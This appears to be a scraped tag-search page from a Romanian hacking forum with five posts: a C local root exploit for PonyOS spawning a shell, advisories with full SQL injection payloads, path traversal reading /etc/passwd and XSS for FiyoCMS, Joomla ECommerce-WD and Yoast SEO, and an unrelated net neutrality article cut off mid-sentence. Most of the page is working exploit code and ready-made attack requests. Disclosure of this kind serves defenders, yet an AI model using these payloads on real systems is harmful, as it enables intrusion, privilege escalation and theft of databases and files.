Jump to content

Search the Community

Showing results for tags 'title'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 5 results

  1. # Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit # Google Dork: [if applicable] # Date: 29th June 2015 # Exploit Author: HackerFantastic # Vendor Homepage: www.ponyos.org # Software Link: [download link if available] # Version: [app version] PonyOS <= 3.0 # Tested on: PonyOS 3.0 # CVE : N/A # Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c /* PonyOS <= 3.0 tty ioctl() root exploit ======================================== PonyOS 0.4.99-mlp had two kernel vulnerabilities disclosed in April 2013 that could be leveraged to read/write arbitrary kernel memory. This is due to tty winsize ioctl() allowing to read/write arbitrary memory. This exploit patches the setuid system call to remove a root uid check allowing any process to obtain root privileges. John Cartwright found these flaws and others here: https://www.exploit-db.com/exploits/24933/ Written for educational purposes only. Enjoy! -- prdelka */ #include <stdio.h> #include <stdlib.h> #include <sys/ioctl.h> int main(){ struct winsize ws; printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n"); memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8); ioctl(0, TIOCSWINSZ, &ws); ioctl(0, TIOCGWINSZ, (void *)0x0010f101); printf("[-] patched sys_setuid()\n"); __asm("movl $0x18,%eax"); __asm("xorl %ebx,%ebx"); __asm("int $0x7F"); printf("[-] Got root?\n"); system("/bin/sh"); } Source @Byte-ul nu am timp sa fac demo si nici "resursele necesare" am sa inchid thread-ul pentru a evita offtopic-ul.
  2. # Exploit Title: FiyoCMS Multiple Vulnerabilities # Date: 29 March 2015 # Exploit Author: Mahendra # Vendor Homepage: Open Source CMS, CMS Indonesia - Fiyo CMS # Software Link: Fiyo CMS | SourceForge.net # Version: 2.0.1.8, other version might be vulnerable. # Tested : Kali Linux 1.0.9a-amd64 # CVE(s): CVE-2014-9145,CVE-2014-9146,CVE-2014-9147,CVE-2014-9148 *Advisory Timeline* 30-11-2014: Vendor notified and responded back 01-12-2014: Vulnerabilities provided to vendor 03-14-2015: Vendor released newer version claimed to fix the vulnerabilities 29-03-2015: Advisory released ---------------------------------------------------- FiyoCMS 2.0.1.8 SQL injection, XSS, Direct URL bypass ---------------------------------------------------- *Advisory details* Several security issues have been identified on the latest FiyoCMS platform. *Proof of Concept (PoC)* ---------------------------------------------------- Multiple SQL Injection - CVE-2014-9145 ---------------------------------------------------- * PoC: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=edit&id=1[sqli] * Sqlmap: Parameter: id Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: app=user&act=edit&id=-7672 UNION ALL SELECT NULL,NULL,CONCAT(0x7171676471,0x66457070464452786c58,0x716a767471),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: app=user&act=edit&id=1 AND SLEEP(5) * PoC: http://192.168.248.132/fiyo/dapur/apps/app_article/controller/article_list.php?cat=[sqli]&user=[sqli]&level=[sqli]&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 * Sqlmap: Parameter: cat Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=' AND (SELECT 4352 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (4352=4352) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yeEe'='yeEe&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: cat=' UNION ALL SELECT NULL,CONCAT(0x71666f7671,0x4f654364434f746c7477,0x7164687671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: cat=' AND 2332=BENCHMARK(5000000,MD5(0x4a495770)) AND 'RlLS'='RlLS&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Parameter: level Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=&user=&level=' AND (SELECT 6522 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (6522=6522) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pqqp'='Pqqp&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: cat=&user=&level=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71666f7671,0x6163446a67456e557a48,0x7164687671),NULL,NULL,NULL#&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: cat=&user=&level=' AND 6567=BENCHMARK(5000000,MD5(0x57586864)) AND 'hMLH'='hMLH&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Parameter: user Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=&user=' AND (SELECT 8990 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (8990=8990) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VhKM'='VhKM&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: cat=&user=' UNION ALL SELECT NULL,CONCAT(0x71666f7671,0x4652577247546e6b5241,0x7164687671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: cat=&user=' AND 1262=BENCHMARK(5000000,MD5(0x72797451)) AND 'egJe'='egJe&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 * PoC: POST /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/1.1 Host: 192.168.248.132 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=add Content-Length: 42 Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off Connection: keep-alive Pragma: no-cache Cache-Control: no-cache act=email&email=test@asdas.com[sqli] * Sqlmap: Parameter: email Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act=email&email=test@asdas.com' AND 5514=5514 AND 'KTqH'='KTqH Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=email&email=test@asdas.com' AND SLEEP(5) AND 'UjqT'='UjqT * PoC: POST /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/1.1 Host: 192.168.248.132 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=add Content-Length: 34 Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off Connection: keep-alive Pragma: no-cache Cache-Control: no-cache act=user&username=test[sqli] * Sqlmap: Parameter: username Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: act=user&username=test' AND 5514=5514 AND 'KTqH'='KTqH Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=user&username=test' AND SLEEP(5) AND 'UjqT'='UjqT -------------------------------------------------------------------- Directory Traversal - kcfinder plugins - CVE-2014-1222 -------------------------------------------------------------------- FiyoCMS was identified to be using an outdated KCFinder plugin which vulnerable to directory traversal attack. POST /fiyo//plugins/plg_kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1 Host: 192.168.248.132 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.248.132/fiyo//plugins/plg_kcfinder/browse.php?type=files Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 34 dir=files&file=../../../../../../../etc/passwd ---------------------------------------------------- Reflected XSS - CVE-2014-9146 ---------------------------------------------------- http://192.168.248.132/fiyo/?app=article&view=item31ab2"><script>alert(1)</script>0ccba&id=186 http://192.168.248.132/fiyo/?app=article&view=item&id=18690fdb"><script>alert(1)</script>d99c9 http://192.168.248.132/fiyo/?page=5eac15eac1"><script>alert(1)</script>774f2 http://192.168.248.132/fiyo/?app=article95ce1"><script>alert(1)</script>298ab&view=item&id=186 http://192.168.248.132/fiyo/dapur/index.php?app=module&act=edit%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&id=5 ---------------------------------------------------- Direct URL Access - CVE-2014-9147 ---------------------------------------------------- To download database backup without any authentications required. http://192.168.248.132/fiyo/.backup/[db_backup.sql filename] ---------------------------------------------------- Access Control Bypass - CVE-2014-9148 ---------------------------------------------------- To access super administrator functions "Install & Update" and "Backup" by administrator user, just go directly to the URL below: 1. http://192.168.248.132/fiyo/dapur/?app=config&view=backup 2. http://192.168.248.132/fiyo/dapur/?app=config&view=install Source: http://dl.packetstormsecurity.net/1503-exploits/fiyocms-sqlxssbypass.txt
  3. Version 1.2.5 of the ECommerce-WD plugin for Joomla! has multiple unauthenticated SQL injections available via the advanced search functionality. http://extensions.joomla.org/extension/ecommerce-wd The vulnerable parameters are search_category_id, sort_order, and filter_manufacturer_ids within the following request: POST /index.php?option=com_ecommercewd&controller=products&task=displayproducts HTTP/1.1 Host: 172.31.16.49 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.31.16.49/index.php?option=com_ecommercewd&view=products&layout=displayproducts&Itemid=120 Cookie: 78fdafa5595397a1fc885bb2f0d74010=q1q1ud2sr0la18o5b38mkbdak2 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 321 product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Vectors: Parameter: filter_manufacturer_ids (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1) AND 8066=8066 AND (7678=7678&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1) AND (SELECT 7197 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(7197=7197,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1212=1212&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1) AND (SELECT * FROM (SELECT(SLEEP(5)))SrXu) AND (1480=1480&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Parameter: search_category_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) AND 3039=3039 AND (6271=6271&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) AND (SELECT 5158 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(5158=5158,1))),0x71706a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8257=8257&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) AND (SELECT * FROM (SELECT(SLEEP(5)))AUWc) AND (1251=1251&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1) UNION ALL SELECT CONCAT(0x71786a6b71,0x704f43796c4773545349,0x71706a6a71)-- &filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=12 Parameter: sort_order (POST) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc,(SELECT (CASE WHEN (8973=8973) THEN 1 ELSE 8973*(SELECT 8973 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&pagination_limit_start=0&pagination_limit=12 Type: AND/OR time-based blind Title: MySQL >= 5.0.11 time-based blind - ORDER BY, GROUP BY clause Payload: product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=1&filter_filters_opened=1&filter_manufacturer_ids=1&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc,(SELECT (CASE WHEN (6064=6064) THEN SLEEP(5) ELSE 6064*(SELECT 6064 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&pagination_limit_start=0&pagination_limit=12 Metasploit modules that exploit the UNION-based injection are available on ExploitHub: Enumerate users -- https://exploithub.com/joomla-e-commerce-wd-plugin-users-enumeration-via-sql-injection.html Read files -- https://exploithub.com/joomla-e-commerce-wd-plugin-file-download-via-sql-injection.html Write payload to web directory -- https://exploithub.com/joomla-e-commerce-wd-plugin-sql-injection.html -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website Source
  4. Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection Version/s Tested: 1.7.3.3 Patched Version: 1.7.4 CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C) CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C) WPVULNDB: https://wpvulndb.com/vulnerabilities/7841 Description: WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used to improve the Search Engine Optimization (SEO) of WordPress sites. The latest version at the time of writing (1.7.3.3) has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities. The plugin has more than one million downloads according to WordPress. Technical Description: The authenticated Blind SQL Injection vulnerability can be found within the 'admin/class-bulk-editor-list-table.php' file. The orderby and order GET parameters are not sufficiently sanitised before being used within a SQL query. Line 529: $orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( $_GET['orderby'] ) ) : 'post_title'; Line 533: order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) ); If the GET orderby parameter value is not empty it will pass its value through WordPess's own esc_sql() function. According to WordPress this function 'Prepares a string for use as an SQL query. A glorified addslashes() that works with arrays.'. However, this is not sufficient to prevent SQL Injection as can be seen from our Proof of Concept. Proof of Concept (PoC): The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin, editor or author user. http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc Using SQLMap: python sqlmap.py -u " http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc" --batch --technique=B --dbms=MySQL --cookie="wordpress_9d...; wordpress_logged_in_9dee67...;" Impact: As there is no anti-CSRF protection a remote unauthenticated attacker could use this vulnerability to execute arbitrary SQL queries on the victim WordPress web site by enticing an authenticated admin, editor or author user to click on a specially crafted link or visit a page they control. One possible attack scenario would be an attacker adding their own administrative user to the target WordPress site, allowing them to compromise the entire web site. Timeline: March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst (WPScan Team - Dewhurst Security). March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team). March 10th 2015 - 20:00 GMT: Vendor contacted via email. March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave expected patch timeline. March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches this issue. March 11th 2015 - 12:30 GMT: Advisory released. Source
  5. The chairman of the Federal Communications Commission announced recently he would seek to reclassify broadband Internet as a common carrier service so the government could enforce net neutrality rules, something that President Obama supports. Some telecom executives and Republicans in Congress are calling this an “extreme” and “backwards” proposal, and they’re investigating the President’s role in pushing for it. But we’ve only reached this pivotal moment in the net neutrality debate because of past efforts by corporate lobbyists and their political allies to weaken the government’s ability to protect the open Internet. Without the telecommunications industry’s massive power to design policies in its favor, the government would most likely already have the authority it needs to ensure net neutrality. In the early 2000s, back when Gmail was still for Garfield fans only, policymakers were facing important questions about the nature of broadband Internet and how it should be treated by regulators. The last major telecommunications bill was passed by Congress in 1996 and since then the technology had advanced rapidly, with two different services, cable Internet and digital subscriber line (DSL), becoming widely available. These services both operated on infrastructure that was originally built for other purposes (cable television and landline telephony, respectively), and since the 1996 bill didn’t address Internet service in a substantial way, regulators had simply applied the regulatory treatment traditionally associated with the infrastructures to the new Internet services being offered on them. That meant that cable Internet, carried over lines used to transmit television, was treated like an “information service,” while DSL, carried over copper telephone wires, was treated like a “telecommunications service.” The distinction is critical because under the 1996 law telecommunications services— things like wireline telephone service—are regulated more heavily under Title II of the law while information services—things like television channels and websites—are more lightly regulated under the Federal Communication Commission’s ancillary authority originating in Title I. Cable systems also face cable-specific rules from Title VI, which was added to communications law in 1984. Title II was designed by Congress in 1934 to prevent the companies that provide basic communications services from engaging in anticompetitive and discriminatory practices. It treats these services as “common carriers”—essentially private utilities that have to meet certain public benefit, openness, and 